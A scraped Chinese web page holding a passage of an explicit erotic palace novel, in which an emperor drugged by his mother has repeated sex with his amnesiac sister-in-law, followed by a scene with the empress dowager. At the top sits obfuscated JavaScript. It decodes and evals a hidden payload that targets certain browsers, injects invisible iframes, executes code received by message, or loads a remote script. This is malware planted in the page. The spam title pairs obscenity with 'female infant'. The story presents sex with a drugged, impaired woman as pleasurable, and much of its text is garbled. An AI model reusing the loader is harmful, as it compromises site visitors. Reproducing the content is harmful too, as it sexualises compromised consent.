h文女高中生_小说猥琐女婴

eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
(37鲜币)37英雄一梦(2)(慎)

[公告]:往後的《交换》改用第三人称写,因为第一人称在以後的文本中我驾驭不了,望读者朋友海涵。

☆☆

药效过去,理智回笼,轩辕炼脸色骤变。

该死!轩辕炼双掌磨了磨了脸,他怎麽会对弟媳做了如此禽兽不如的事情来?!

轩辕炼平生第一次产生了逃跑的念头,他心烦意乱地穿了衣服,胡乱地套上鞋子,下了床榻,正要走时,又听到她低声的唤他:“皇兄……”轩辕炼的身子一顿,她醒了?现在应该哭著骂他是禽兽了吧?轩辕炼烦躁地想著。理智让他必须得离开这里,可是他的脚却迈不出步伐去。沈默了半响,轩辕炼深吸了一口气再次跨步往前走去。

“皇兄你不要走,我一个人害怕。”一句话害的轩辕炼僵了身子,脚步重得再也举不起来了,他缓缓地转过头来,只见“心娴”已经坐起身来,她羊脂白的手儿紧揪著被子,双眸正朦朦胧胧的瞅著他看。

“你……”轩辕炼张了张口,声音有些轻颤有些沙哑,“你知道不知道我对你做了什麽样的事情?”

“嗯?”“心娴”歪著头,一副懵懂的样子。

轩辕炼转过头去,一瞬不瞬地盯著她看了好一会儿,见她依旧不明所以的眨巴眨巴眼,不由得哑然失笑,“看来你是不懂了。”

“皇兄干嘛站著说话?过来坐著聊啊!”“心娴”笑笑,把她自个儿的身子往床榻里挪了挪,再用手拍了拍空出大好的位置。

轩辕炼愣在原处,不知道该做如何反应。

“皇兄?”

轩辕炼深邃了双眸,缓缓地往回走,坐到床沿上,伸出手指描绘著她尖细好看的小脸蛋,纤长的指尖滑到脑袋的位置上时倏然停住了,眯著眼,轻叹道,“你这里摔坏了。”

“心娴”撇了撇嘴,瞪得圆圆的眼睛直直地盯著轩辕炼看,嗫嚅道,“皇兄是在说我傻了吗?”

“没有。”轩辕炼恢复了冷面,言简意赅的回道,顺便把抚在她脸上的手也给抽回来了。

“你明明就骂我!你别以为我真的傻了,听不出你那话的意思!”

“我真没骂你。”轩辕炼的声音依旧没有温度,可他的表情却是极为认真的。

“明明就有!你骂我脑袋摔坏了!”

“嗤!”轩辕炼嗤笑了一声。

“你笑什麽?!”

“笑你笨。”

“皇兄你欺负人!”

“你睡吧。”轩辕炼冷冷瞟了她一眼,不去理会她的愤怒,径直站起身去,转了身就想走人。

“皇兄……”“心娴”揪住了轩辕炼的衣服,不让他走。

“嗯?”轩辕炼微微转过头去看她。

“不要走。”她可怜兮兮地哀求道。

“……”轩辕炼定定凝著她看,眼眸中看不出一点情绪。

“皇兄,你上来,夜里冷,小心著凉了。”“心娴”撩起一半被褥,空出一大片床位,伸手抓住轩辕炼的手臂,拉著他的手臂往床榻上拖。

“我鞋子还没有脱。”轩辕炼淡淡说了这麽一句。

“咦?”“心娴”眨巴眨巴眼,双眸晶亮晶亮的,笑了起来,“皇兄愿意留下来陪我了,是不是?是不是嘛?”

轩辕炼勾起唇,淡淡一笑。“心娴”瞪大了眼眸,像发现了什麽稀罕物似的叫了起来,“我看到皇兄笑了,皇兄笑起来真好看。”

轩辕炼抿紧唇不答腔,冷著脸弯下腰脱了鞋子,上了床榻。

“心娴”很会照顾人得把被褥给轩辕炼盖上,然後侧躺著身子,与轩辕炼面对著面。

轩辕炼表情冷漠地睨了她一眼,便径直闭上了眼睛。

“……”烛光淡淡中,屋里寂静无声,只有两种忽深忽浅的呼吸声。

“皇兄。”“心娴”眨巴眨巴眼,漆黑的眸子牢牢地盯著轩辕炼看。

“……”轩辕炼闭著眼,一动不动。

“皇兄。”“心娴”用手肘撑起身子,嘟著小嘴,朝轩辕炼的脸呼了一口热气。

“……”轩辕炼闭著眼,一动不动。

“皇兄。”“心娴”顿觉无聊地拿起自个儿的头发在轩辕炼俊逸的脸庞上扫来扫去。

“……”轩辕炼闭著眼,一动不动。

“皇兄。”“心娴”伸出手指戳戳他的肩膀。

“……”轩辕炼闭著眼,一动不动。

“皇兄。我发觉你的没有明月的硬。”“心娴”打了个呵欠,很八卦地说道。

“……”轩辕炼猛地张开了眼睛,冷冰冰地盯著“心娴”看。

“心娴”一脸委屈地扁扁嘴,问道,“皇兄,你干嘛凶巴巴的看著我?”

“你想再试试?”

“呃~呃?呃!”“心娴”眨巴眨巴眼,完全不在状况内。

“我会证明我的不比明月的软。”轩辕炼浅浅勾唇,只是他并没有把笑容延伸笑到眼底去,这种笑叫做“皮笑不笑”。

“啊?啊!啊。”“心娴”傻呼呼地依依呀呀了几声後,才恍然想起自己刚才对轩辕炼说了什麽,“哦。其实皇兄你的也很硬啦,就是比明月的软了那麽一点点而已,你不要太计较啦。”她说的那个是指臂上的那块。

“不行,我什麽都可以不计较,但对这个我绝对要计较。”轩辕炼说的那个是指胯间的那。

“喔。你多练练呗。练多了自然就硬起来了。”“心娴”没心没肺地笑个春光灿烂。

“你陪我练吧。”轩辕炼说话的声调依旧冰冷,可眼睛里却多出了笑意。

“心娴”眨巴眨巴眼,摇摇头,“我不喜欢自己的硬硬的,因为我觉得我的软软的会比较好看。”

“你帮我把弄硬了就行,至於你的,你就是想硬也硬不了。”轩辕炼说的话带有很浓重的黄颜色,可是他的表情却是如同他处理国家大事一般的一本正经。

“啊?”“心娴”本就没听懂,像个小傻瓜。

轩辕炼坐起身子,动作鲁地扯掉了他的衣衫,露出健美的膛来。顺便他把裤子都脱了,全身赤裸裸的呈现在她的面前。

“……”“心娴”眨巴眨巴眼,小嘴巴微微张开,有些懂了,她摔了脑袋,人是失去了记忆,但并不是变成傻子。

坐起身的轩辕炼垂眸看著躺在床榻上的“心娴”,顿时心头升起了一股子罪恶。他吸了吸喉咙,沙哑道,“如果你不想帮我把弄硬了,那就算了。”说著话,他怕自己会反悔似的又揪衣服要往身上套。“心娴”坐起身子扯住了他穿衣服的动作。

轩辕炼拿眼冷冷地看她,她眯眼一笑,道,“做那个很舒服,我勉为其难地答应帮你吧。”

“啊?”现在轮到轩辕傻眼了。

“啊什麽啊,哈哈,皇兄,你现在的样子看起来好傻!”“心娴”呵呵大笑,一点也不给轩辕炼面子。

“……”轩辕炼抿紧唇,眼眸更深邃了。

“皇兄,你怎麽了?”

轩辕炼了一把脸,眯起眼,呢喃道,“看来你的脑袋的确是摔坏了,而且还坏得很严重。”她的脑子现在基本上不存在後天教育得来的礼义廉耻,一身的单纯天,一身的自然本能。

“皇兄,你怎麽又骂我!”“心娴”一脸的愤怒,抬脚就要踢轩辕炼。

轩辕炼的大手一伸,牢牢地箍住了她的小脚,顺道的把她的腿狠狠地往她的子上压去。

“呀~”“心娴”没有穿亵裤,被这麽一踢,划出一阵风,胯间顿时凉飕飕的。

“心娴”直觉反应的骂他,“色狼。”虽然她现在基本上不太明白这个词的意思。

轩辕炼不理她,歪著头,把唇抵在她的大腿内侧,伸出舌头徐徐向上舔去。

“啊~好痒……”“心娴”的腿儿颤了颤,显然是耐不住痒。

“屁股别扭。”轩辕炼冷冷地抬眼瞥了“心娴”一眼……一手摁住她那条被他高高举起的大腿,一手扒开她粉红鲜嫩的花办,舌头伸长,刺进柔软的缝里,旋转舔舐。

“嗯,啊……哈啊……”“心娴”闭上眼,难耐激情地咬著下唇,双手紧紧抓住身下的被褥,使力地绞了起来。

轩辕炼的舌功又硬又软,舔了不一会儿,就把“心娴”软里的**给舔的流个不停。轩辕炼微阖著眼,“咕噜,咕噜~”地吞进了喉咙里去。

“皇兄……哈啊……你好脏……”从那里面分泌出的水他居然也能喝得如此饥渴?

轩辕炼并不搭腔,他双手并用的揉上了“心娴”的屁股,把“心娴”白白嫩嫩的屁股揉搓得几乎变了形状。

“嗳嗳……”“心娴”张著小口不停的喘息著,她拱起腰肢,凭借著本能向上耸著臀部,想要轩辕炼的舌头的更深。

“小娃,这麽急!”轩辕炼拢著眉头,抽出了舌头。大掌不轻不重的拍在“心娴”的屁股上发出清脆的“啪啪”声。

“嗯,啊啊……”这麽一拍打,“心娴”下面的儿缩动的更加厉害了起来。

“欠人收拾的小娃,你很需要被人狠狠的对待,是吧。”轩辕炼的表情冷冷,声音冷冷,一本正经,一点也不像要干那事的样子。

“干嘛要叫我‘小娃’,太难听了。”“心娴”嘟著小嘴抗议著,其实他每叫一次她“小娃”她的道里就会跟著收缩了那麽一下下,还不停的流**。

“我喜欢这个称呼。”轩辕炼一面很是冷淡的回答,一面用手扶著他那长的顶在软软的口,正打算进去。

“噗滋!”一声,**微溅,轩辕炼已经把他的大头进了软软的道里头。

“呀,啊啊啊啊!”头的硬把“心娴”的满脸荡的尖叫了起。轩辕炼见此心里稍稍的满足了一下下,不由加重了力道,一个狠劲,“咕滋!”一声,他的头顶到了子口上。

“呃啊!”把都了进去後,轩辕炼终於是微微变了脸色,连声音都充满了亢奋。不过随即他便恢复成一副冷漠样。

“嗯……”了几十下後,也适应了让大的入,感觉就出来了,含著的儿酸酸涨的流出了大量的**来。可惜此刻的轩辕炼表情依旧还是冷冷淡淡的,一点也不像在“办事”时候的样子。

“心娴”看不管他这副假正经的嘴脸,不由地眯起晶亮的眸,双手牢牢圈住轩辕炼的脖子,扭动屁股磨著他嵌在她身体里的,小嘴贴著轩辕炼的耳畔,娇喘道,“皇兄,我里面好酸……好舒服……啊哈……嗯唔……你的好硬,好大,好……啊哈呃啊……嗯呃嗯呜……”

“你这娃!呃,啊啊!你存心要我把你肏烂,是不是?啊,哈,啊啊,该死的娃!!”“心娴”的道紧紧地裹住轩辕炼的大,微微翕动的摩擦著大的棍身,又软又绵又舒服。

“唔唔唔!你真小,真窄,真暖。我进去都不想抽出来了。”轩辕炼微微张著唇,把抽出短短的一小截後再重重地往里面去,“咕滋。”一声,头牢牢的嵌在子口上,“噗嗤”一声拔罐声响,头吸著子口的儿拖了老长出来。

“心娴”前那两团又白又圆的子随著轩辕炼的飞快抽上上下下前前後後左左右右来来回回的晃荡个不停歇,轩辕炼看得两眼越大的暗沈了下来,他吸了吸喉咙,伸出双手一手掌罩一只,又挤又捏的把玩了起来。在满足手感的同时,他下面的也没忘把“心娴”的儿狠狠地来。

看著单纯的弟媳正被自己压在身下的**直流,这是一种无与伦比的刺激,不仅是刺激了轩辕炼的脑袋,更是刺激了他的欲火,害的他的硬的像铁,而且还是越磨越硬的那一种。

轩辕炼兴奋到极点,他喘嘘嘘地问:“我的硬不硬?”“硬,好硬。”“心娴”脑袋晕忽忽得应了声。

了好一会功夫後,轩辕炼倏然抽出了他长长的,改变了姿势,大手撑开了“心娴”的一条大腿,侧躺著身子,对准,“吱”的一声,头进子去,轩辕炼深吸了一口气,缓缓地抽出一大截再使力地全入。“啊!你的太深了。”

“皇兄,皇兄……好舒服……呃啊……做这个怎麽就这麽舒服呢?呃啊呜嗯……”轩辕炼把他的飞快的,直的“心娴”心儿都酸酸的,好生的快乐。

看著她被的两眼泪弯弯,整个小脸蛋都粉嘟嘟的甜美样子,轩辕炼的兴奋的跳了又跳,越发的硬实了起来。

轩辕炼长长吁了口气,声音带著颤抖,“哦,~呃啊。……我动作的快不快……肏的你舒服不舒服?嗯?呃啊,呜~哈,啊!”轩辕炼的飞快的在“心娴”的体内刺进又抽出的,每次都抽出时只留一个头在她体内,每次入时几乎都尽而没。

“嗳儿,嗳儿……你动的好快……的我好舒服……”“心娴”从善如流的回答著。

轩辕炼听了心花怒放,抽的更加使劲,速度又快、又密集,直的儿发出“渣渣,渣渣。”的器相套声,黏黏粘粘的。两体交合流出来的体的荡渐渐味道儿充塞了整个房间。

“啊啊啊啊啊!”轩辕炼扭曲了声调,嘶哑的高亢叫起,一种致命的快感从他的胯间涌上了他的脑门,轩辕炼咬紧牙关克制住的冲动,放下“心娴”被高高举起的大腿,翻身压上“心娴”的身体,抱起了“心娴”的屁股,把她的屁股抱离了床榻,急速地在“心娴”的身体里边进进出出,喉咙里发出了破碎的暴吼声,“心娴”突觉得轩辕炼的大在她的体内一颤一颤的跳动著,倏然她的子一热,一脉脉温柔的体“噗啾,噗啾。”的全数进她的子里头去。

“啊──”“心娴”的子被温热的一烫,花心乱颤了起来,里儿狠狠咬住了一颤一颤在跳动的,一股子**狠狠的喷出来,达到了此次欲的最高潮。

**

後的轩辕炼紧紧搂著“心娴”膛贴著脯,腿儿贴著腿儿的把四肢交绕在一起,看著她娇喘吁吁一副累坏了的样子,轩辕炼不由把眸光放柔,水色嘴唇贴著“心娴”的小嘴亲了又亲。心娴不耐干扰,甩了甩头後直接把脑袋埋在他的膛里,小口张张合合的一通拼命喘息後,她嘟著嘴,抱怨道,“皇兄,我浑身都是汗,黏黏的,好难受,我要洗澡。”“明天再洗。”这麽晚了命人弄一大桶水来也是挺吸引人注意的。

“哦。”“心娴”扁了扁嘴,因为**的药在她体内还没全散去,所以她并不坚持要洗澡。“皇兄,做这个好舒服,我们多做几次好不好?”说话的同时,她把腿张的开开的,等待轩辕炼把大狠狠的进去。

轩辕炼听了这句又天真又荡的话儿,看著她这个又单纯又下贱的动作,他的眼眸不由暗了暗,胯间再度硬起,他咬牙低咒一声,猛的翻起身子,又骑到“心娴”的身上去了。

随後轩辕炼一手捉著她的一只子,一手微微撑开紧的让男人的孽留恋忘返的洞,腰肢一沈,“吱”的一声把进了三分之一。

“好紧……你里面被撑的绷绷的,我快把你给撑裂了吧。唔!啊!”轩辕炼拱起腰肢,一个使劲,把整都了进去。

“嗳!”“心娴”张合著小嘴低叫出声。

她轻轻地一声低叫,吸引住了轩辕炼的注意力,轩辕炼一弯身,把他的嘴压在她的忙著喘息的小嘴上用力的亲了起来。“嗯,唔唔!”轩辕炼一面贪婪地亲著她的小嘴,一面用力捏著她的子,一面不停耸动著他的臀部,飞快的抖动他的屁股,使劲的抽,“心娴”被的脑袋晕眩,两眼直掉眼泪。

“心娴”自觉地把双脚缠上轩辕炼的腰後,把软软、湿湿的尽量的支的开开的,撑著一口气,接住轩辕炼疯狂的穿刺。

只听抽发出黏黏粘粘的“渣渣,渣渣。”声越来越响,“心娴”越发地把轩辕炼抱得死紧。此刻,轩辕炼正把屁股抖的飞快,直把“心娴”的儿弄得**直冒,把大腿、身下的被褥都弄湿了为止。

越做汗就流得越多,“心娴”越是想抱紧轩辕炼,越是手滑。

“皇兄,我抱不住你了……”“心娴”很是委屈的说道。

听此,轩辕炼抽的动作顿了顿,随後他立即换了个姿势,让“心娴”趴跪在床榻上,他的从屁股後面把她贯穿,顶的又狠又急,把“心娴”的身体的往前一耸一耸的抖动著。她的整个身子剧烈的摇晃,臀部嫩房晃成一片白花花的浪儿。

双臂撑的累了,软了下来,只剩下一个屁股还高高的被轩辕炼抓著承受著他的抽。

“嗳儿,嗳儿……”

“看你叫的多荡,被肏的感觉有那麽舒服吗?”轩辕炼哑著嗓音问。

“心娴”只顾嗳儿嗳儿的乱叫本没空搭腔,轩辕炼捉紧她的屁股,用上更狠的劲来她,再问道:“快告诉我!告诉我,你被的感觉……”

“嗳儿,嗳儿,……”“心娴”一边嗳儿嗳儿的乱呻吟,一边嘶嘶哑哑的回答道,“舒,舒服……我被你的好舒服……嗯,啊,啊!嗳儿嗳儿……”

“比明月你还舒服吗?”不知道为什麽,轩辕炼就是想和轩辕明月比一比,比谁会带给她更大的快乐。

“啊,哈啊,嗯呜,呃唔……你的我比较舒服!”她虽然脑袋被摔坏了,但是那股子小聪明劲还是在的,此时此刻该怎麽回答他才是对自己最好的,她还是清楚的。

“你跟我说说,我们的,呃啊!啊,唔~谁的比较硬?”

“你的硬……”身下的都被他们的动作搅的凌乱凌乱的,看起来好邋遢。

“的你里面酸不酸?”

“酸。”其实该说的是“爽”。

“想不想我的更狠更快?”

“想……”说想字时,“心娴”的颤颤收缩。

“呃,你这该死的娃儿!”轩辕炼的速度疾如暴风骤雨,小腹飞快的贴在“心娴”的屁股,抖动的飞快。他次次尽,越越猛,的“心娴”嫩的水儿叽里咕噜的直往口喷涌出来,有些水儿啪嗒啪嗒的流到了床榻上,有些水儿则沿著她的羊脂白的腿侧蜿蜒的流到了腿窝里。

“啊啊啊啊啊!”到极限处,轩辕炼如野兽暴吼,疯狂抖了抖,再度出了浓稠的来……

**

白色的体流了满榻都是,此时此刻,就连他们也不知道已经做了多少次了。

“再来!”显然轩辕炼还没有要够,他捉著“心娴”的腰肢,像抱小娃娃似的一扯就起,放坐在他的两条大腿上,他自己则双手向後撑著,借力使力,飞快的向上耸著小腹,把深深又浅浅的直往她的深处。

“你现在还有力气做这麽高难的动作?”好厉害。

轩辕炼挑了挑眉,问道,“难不成你要帮我动?”

“心娴”翻了个白眼,“做这个事本来就是互动的,你一个人整,也不好玩,不是吗?”

“嗯嗯,那你动吧。”轩辕炼表情淡淡,从善如流。

“心娴”把手撑在他的肚子上。

“唔~”轩辕炼闷哼了一声,冷著脸说道,“把手摁到别处去。”

“心娴”伸出手指戳了戳他的肚皮,抬眼瞥了他一眼,“你肚皮上都没有,难怪压你会觉得痛。”

“心娴”改为把手摁在轩辕炼的大腿跟处,跪坐起身子,高高低低的提放著屁股,上下套动轩辕炼那结实的。

“哎啊……你好硬,磨了这麽久了,你都没软点。”“心娴”嘟著小嘴,瞪著轩辕炼,嘟嚷的抱怨道。

“你再磨一会儿就软下去了。”做了这麽多次,轩辕炼也力不从心了。

“哦。是不是再也硬不起来了?”

“是今晚暂时硬不起来。”轩辕炼冷淡的纠正。

“我就是这个意思,你不用特意纠正。”身为男人还这麽小心眼,真小气。

“你再动快一点。”

“我没有力气了,就只能动这麽快。”不满意就拉倒,反正只要她自己舒服了就好。

“真没用。”

“你才没用,你等下就没用了。”等一下下他就再也硬不起来了。

“你说话要小心,男人是得罪不起的。”轩辕炼冷冷地瞥了她一眼。

“哼。”转开眼睛不看他,反正随便他什麽整,做这种事情都是舒服的,她怕他做甚?

“坐稳了。”正说著话,轩辕炼坐直了身子,双手伸直“心娴”的肩窝,把她的身子上提下放的狠命做弄。

“呀~啊啊啊!”“心娴”慌不择物的紧紧抓住了轩辕炼的头发狠狠的扯。

“嘶!放手!”随著“心娴”身体剧烈的上下跳动,被揪了的头发也跟著一上一下的拼命抖动,扯的轩辕炼的头皮他突一突的发痛著。

“呀!啊啊啊啊啊!”“心娴”只顾快慰的叫,本不管轩辕炼的命令。

“放开我的头发,听到了没有!”

“嗯,哈啊,啊啊啊啊!”“心娴”哪有功夫理他,张著小嘴巴,叫了个欢畅。

做到这个关键的时候,轩辕炼又不能停下来,一停下来他保准。於是他只好忍著痛,暴力的继续抽个二百多下後,终於低吼了一声,出了浓稠的来……

☆☆

注:此处的这个心娴是假的心娴,为了与真的心娴区别开来,加个“”号。2011.05.19

38.皇兄,我好痛~

翌日,下朝後,陈瑞弓著身子疾步走到轩辕炼的身旁边低声的禀报,道,“皇上今早太後中的人查了翻牌处。”

轩辕炼寒了眼眸,双手负背,转身往太後所住的殿走去。陈瑞弓著身子急步急跟了上去了。

行往太後寝的路上,一小太监远远处见轩辕炼来了,脸色惊变,急匆匆地猫著身子往太後寝而去……

**

“孩儿给母後请安。”

“皇上来了,坐。”太後在临窗的榻上坐直了身子,双眸含笑地望向轩辕炼。

“谢母後。”轩辕炼耷拉著眼,一边撩起衣袍坐落在婢搬来的椅子,一边毫无掩饰的直奔主题。“昨儿母後到底在给儿子的那罐粥里下了什麽药?”

太後拿的著佛珠的手顿了顿,随後含糊的回答道,“不过是一些补药而已。”

“什麽补药?那明明就是春药!母後生为一国太後,怎麽就做出如此荒唐之事!若被天下人知晓,皇家的颜面岂不是要荡然无存了!”轩辕炼本是冰冷的脸庞又冷了好几度,话尾的语气也重了一些。

被自己的儿子这麽一呵斥,太後脸面有些挂不住了,她不由的涨红了脸,道,“……自古以来皇家子嗣都是关乎江山社稷的头等大事,可看看皇上,如今膝下就只有三位皇子。这般的情景叫哀家如何能不著急?!”

“母後!”轩辕炼脸颊抽了抽,无奈地揉揉额角,道,“无论是怎麽样的理由,您也不应该对儿子下春药!儿子自认不会是个短命帝王,日後的日子还长著,母後不用急於一时。”轩辕炼徐徐站起身来,再道,“母後,儿子希望这样的事情不会再发生。”轩辕炼说一说完,转身就往殿外走。──纵然太後做的事情有伤体统,但她老人家毕竟还是他生母,他不想多与她计较。

太後怔住,她这个儿子怎麽都好,就是子冷。连对待她这个母亲从来都是冷脸相对。可再冷的脸,也从来没有像今儿这般冷过。不过,随後转念一想:若是寻常男人因为子嗣被母亲下了春药都会恼火,更何况这个男人还是皇帝?

太後感伤的缓缓垂眸,看来,这事儿真是自己做错了……

**

出了太後寝,轩辕炼脸色不愉的快步往前走,陈瑞弓著身子紧跟在後。

突然轩辕炼停住脚步,冷冷道,“不用跟了。”

陈瑞急忙大幅度弓著身子,恭敬应了声“是”。轩辕炼眯了眯眼神色有些复杂的看向前往岫玉楼的方向,随後他像是相通了什麽似的冷著脸色继续往前走去。

**

轩辕炼推开岫玉楼门,缓缓走进屋里,又把门关上,随手上门栓。

纵然是经过了一个晚上的时间,他乍一进里屋,还是能依稀闻到一股属於男欢女爱留下的乱气味。

一想到昨晚上的放浪,轩辕炼不由得暗了暗双眸,顿觉浑身上下有一股火苗在流窜,直烧得他喉头都发了干。

他吸了吸喉咙,稳了稳心神,踱步缓缓走近床榻,只见累坏了的小娇娃此刻正娴静的闭著眼睛,微微弓著身子,一条长长的被褥轻裹在她赤裸的身上,露出一些白皙的肌肤,姿态既妖娆又可爱的在睡大觉。

“心娴。”轩辕炼缓缓坐在榻沿上,举起右手,手指轻颤了一下,犹豫了地看著心娴良久,这才轻触上她的肌肤,推了推她的身子。

‘心娴’眉宇蹙了蹙,颤了颤睫毛,恍恍惚惚地张开了眼睛。她见轩辕炼正坐在榻沿上,不由得双眸亮晶了起来,随後她仿佛是想起什麽来,又很委屈的嘟了嘟唇,揪著轩辕炼的衣角,甜甜软软的抱怨道,“皇兄你去哪里了?我醒来时都没见到你。”

她的这句话让轩辕炼的心重重的一跳,他连忙别看脸去不看她。淡淡回答,“上朝去了。”

“嗯。”‘心娴’点了点头缓缓垂下头去把滑落在腰际的被褥揪起来把自己遮盖个严实,随後她好像想到了什麽似的猛的抬头,用乌溜溜的眼睛一眨不眨的盯著轩辕炼看,“皇兄,今早明月有没有来找我?”

轩辕炼眯著眼,看了她许久後才说道,“今早他没有上朝。”不知道为什麽,他并不想说出明月昨晚上几乎把整个京城都翻了个遍的这件事。明月从来都没有为哪一个女人弄出如此大的动静过,说他已经把这娃儿放在心尖上宠了也一点不为过。

“哦。”‘心娴’失落的垂下眼眸,眼眶一下子通红通红的,“明月终究是不关心我的。”

“心娴……”轩辕炼张了张嘴,终究没有开口把明月有找她的事情告诉她。

“皇兄,”‘心娴’扑到轩辕炼的怀抱里,一耸一耸的抖著肩膀,万般委屈的压抑著悲伤,不让自己哭出声来,“皇兄,我好痛,好痛!头痛、腰痛、嘴痛、心也痛……反正现在全身都痛……”明月他心里真的没有她了吗?若是有她为何没来找她,若是没有她为何又要对她那般好?

“明月不知道你在皇里。”轩辕炼含蓄的告诉心娴,明月有找她。

只可惜心里难受的‘心娴’本就没听出来。‘心娴’一抬眸,愤愤道,“明月是那麽聪明的一个人,他怎麽会不知道我在皇里?!他明明知道我现在失忆了,谁也不记得了。认识的亲人也只有皇兄,我能去的地方也一定也只有皇兄这里!可是他就是没有来找我!”‘心娴’浑身瑟瑟发颤,说著说著就扑簌扑簌的就往下直掉眼泪。

轩辕炼蹙了蹙眉,俯首看向‘心娴’哭的好生可怜的一张脸,不由轻叹一声,低声道,“有时候关心则乱,他也许是一时急张没想到你在皇里头。”这次轩辕炼暗示的更加明显了。

‘心娴’揪紧轩辕炼的衣袖摇了摇,虚弱的哼声,“皇兄,我饿了。”

她这麽毫无预兆的突来一句话弄得轩辕炼有些懵,这娃儿怎麽是一阵一阵的?前一刻,还哭得那麽厉害,下一刻就喊饿了?

轩辕炼软了眼眸,道,“这就命人备来。”

“皇兄,我还要洗澡。全身黏糊糊的,特别是双腿之间的两片花瓣更是黏的我很难受。”

一句话害的轩辕炼的下体处狠狠的跳动了两下。轩辕炼闭了闭眼,低咒一声,冷冷地问道,“你到底要先吃早膳还是先沐浴?”

‘心娴’眨巴眨巴眼,不耐地摆了摆手,很随意的说道,“先洗澡後吃饭。”虽然在她的潜意识里很明白惹帝王一怒是很糟糕的一件事情,但是此刻她并不像今天以前那样还有一些些的怕他了。也就是说她现在一点都不怕他了。──也许是因为她和他有了亲密的关系,女人是很奇怪的动物,她们一旦和谁有了亲密的关系,那麽对待那个人的感觉就会完全的不一样了起来。

不可思议的是,轩辕炼居然没有君威被冒犯的直觉,冷冷嗯了一声後,转身就去实行她的命令去了。
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

